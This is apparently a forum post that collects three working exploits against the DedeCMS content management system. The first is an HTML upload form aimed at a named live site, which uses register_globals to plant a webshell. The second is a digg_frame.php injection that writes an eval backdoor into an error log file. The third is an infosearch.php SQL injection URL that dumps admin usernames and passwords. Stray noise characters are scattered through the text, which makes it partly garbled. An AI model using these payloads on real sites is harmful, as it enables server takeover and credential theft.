' Z9 g, S5 E5 q) M6 x' @5 J
( a/ D7 L6 x/ c6 A# ~6 v
& S5 a2 r9 w4 j/ A8 ^4 c2 z织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
! j& a( O' D/ k" M& ]<html>
$ ]- _% m. n3 S3 w" ?' o<head>
3 r9 ^, Y) W& ]" e O<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>3 k$ M0 i2 l- z1 i% \) h8 y
</head>
% k" ^. `( z2 O7 z# Q6 E2 z<body style="FONT-SIZE: 9pt">
J% v9 U" _$ V) }; x$ i/ f q---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />& O2 {3 d+ J2 g$ ]* `8 }' V
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
) L& ?9 o5 s: a3 n7 v<input type='hidden' name='activepath' value='/data/cache/' />
% s5 h. _) k* D+ I7 \<input type='hidden' name='cfg_basedir' value='../../' />
. L4 K* L6 f s; r- h<input type='hidden' name='cfg_imgtype' value='php' />0 Q+ I9 Z2 Y9 S9 r3 M
<input type='hidden' name='cfg_not_allowall' value='txt' />
/ M, Y3 x) p6 ^! B2 L0 G+ o& }$ n<input type='hidden' name='cfg_softtype' value='php' />* _* j0 d5 h E* Y- e
<input type='hidden' name='cfg_mediatype' value='php' />
+ h+ p/ p' K. h* q<input type='hidden' name='f' value='form1.enclosure' />
Z5 G+ s8 U- N9 l* R" C<input type='hidden' name='job' value='upload' />
6 M J8 f# e7 g1 ]: [/ N<input type='hidden' name='newname' value='fly.php' />
1 m+ q3 M9 G/ FSelect U Shell <input type='file' name='uploadfile' size='25' />
8 ?, `0 Z) c+ s* \6 b8 \4 ?! `<input type='submit' name='sb1' value='确定' />6 V3 L. k/ }! e/ S F5 D
</form>
- U' |% A% m8 \<br />It's just a exp for the bug of Dedecms V55...<br />
7 G' ?1 j+ Z7 F3 `- oNeed register_globals = on...<br />
. e! z' j) N7 ~2 aFun the game,get a webshell at /data/cache/fly.php...<br />0 q2 n5 F8 q. U
</body>
1 \: x! y, N. L/ x+ c</html>
' z# ^8 U, E4 t. Z+ o) K4 E) Y5 s! A) p5 _1 ~( M
0 t$ J# F: _8 D5 m( m5 J' {7 p& o( b: H- b: i' v: z3 H2 ~
' I, l, ?" h9 U" @4 {. d) y
: y {6 y0 A& p& w
: M/ @4 M1 {$ s3 y7 C: ?+ v
4 e5 g$ \: _% N( y2 B3 h' ]/ D* @& L. f/ P/ e: T! V" z
1 ~) O4 a( j2 B4 _* ^ Y2 w
; ^0 |( k; ]5 k; ^
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
( j8 }. K: Y' \* h& p* x" e利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。! [% X% J* k& p8 y
1. 访问网址:
3 p4 n% F: f9 Z K# ^( ? W7 C; ^http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
$ ^, B% x1 M2 f/ w( D可看见错误信息, i7 a, g5 H0 x
0 j$ t4 d5 {- N7 I0 `" D* s/ q# L9 L" d; s
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
' W0 r3 T3 i" I5 eint(3) Error: Illegal double '1024e1024' value found during parsing
( C9 h* B" d* [# h5 U7 _8 ~Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
* T8 D3 l4 Y3 H# m9 V( I- A$ Q3 E6 M l; k" A: Z0 g$ D
5 U/ |. s/ E. `: r/ W7 @6 B- p
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是9 Q I7 N( |& m
/ C& o) s5 e$ [' P
& R) a% p3 q. C<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
6 ~( @9 p% r, ]3 @. X0 l& I5 z. `+ X( T; f6 B) x
, s" d& `4 L+ a2 u; w' m1 b7 ?
按确定后的看到第2步骤的信息表示文件木马上传成功.
( G) L" u/ u* S( J3 p7 N }- s* Q, G+ K( W$ U: ?) }
6 g( H4 I6 B3 j4 x0 A% k9 ]2 V: I2 e* M* o( X1 K y X
1 c$ c# G; R$ T" d9 O0 c# V) ~( e0 T1 h t. ^
( s5 x, f5 l9 E8 V& C2 q' w; Q
5 m o! F" P" L1 I
) Z I& p0 O5 E1 S7 A
3 O6 X, A% ?! L( @( z9 q, q$ q
+ E* A, X+ X$ O* M1 Q- @9 i& O* E, j+ _# J9 e
; m) O: _) G. k8 s/ ]2 ?) |
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
" _+ Z+ [2 d0 P, `5 mhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对